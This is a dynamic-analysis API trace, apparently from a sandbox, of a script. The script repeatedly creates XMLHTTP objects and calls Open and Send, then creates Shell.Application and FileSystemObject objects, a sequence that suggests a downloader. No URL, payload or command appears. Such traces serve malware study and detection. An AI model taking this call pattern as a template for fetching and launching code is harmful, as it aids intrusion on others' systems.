	[0536.208] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0536.208] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0536.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0536.208] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0536.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.208] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0536.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.209] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0536.209] SysStringLen (param_1=0x0) returned 0x0
	[0536.209] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0536.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0536.209] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0536.209] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0536.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0536.209] ??2@YAPEAX_K@Z () returned 0x62f310
	[0536.209] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0536.209] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0536.209] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0536.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0536.209] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0536.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.209] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0536.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.210] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0536.210] SysStringLen (param_1=0x0) returned 0x0
	[0536.210] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0536.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0536.210] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0536.210] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0536.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0536.210] ??2@YAPEAX_K@Z () returned 0x62f330
	[0536.210] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0536.210] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0536.210] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0536.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0536.210] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0536.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.210] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0536.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.211] longjmp () 
	[0536.211] longjmp () 
	[0536.211] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0536.211] SysStringLen (param_1=0x0) returned 0x0
	[0536.211] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0536.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0536.211] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0536.211] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0536.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0536.211] ??2@YAPEAX_K@Z () returned 0x62f310
	[0536.211] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0536.211] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0536.211] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0536.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0536.211] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0536.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.212] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0536.212] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.212] longjmp () 
	[0536.212] longjmp () 
	[0536.212] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0536.212] SysStringLen (param_1=0x0) returned 0x0
	[0536.212] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0536.212] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0536.212] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0536.212] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0536.212] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0536.212] ??2@YAPEAX_K@Z () returned 0x62f330
	[0536.212] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0536.212] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0536.212] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0536.213] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0536.213] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0536.213] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.213] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0536.213] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.213] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.213] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0536.213] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0536.816] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0536.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0536.816] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0536.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0536.816] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0536.816] SysStringLen (param_1=0x0) returned 0x0
	[0536.816] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0536.817] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0536.817] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0536.817] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0536.817] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0536.817] ??2@YAPEAX_K@Z () returned 0x62f350
	[0536.817] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0536.817] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0536.817] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0536.817] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0536.817] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0536.817] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0536.817] SysStringLen (param_1=0x0) returned 0x0
	[0536.817] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0536.820] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0536.820] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
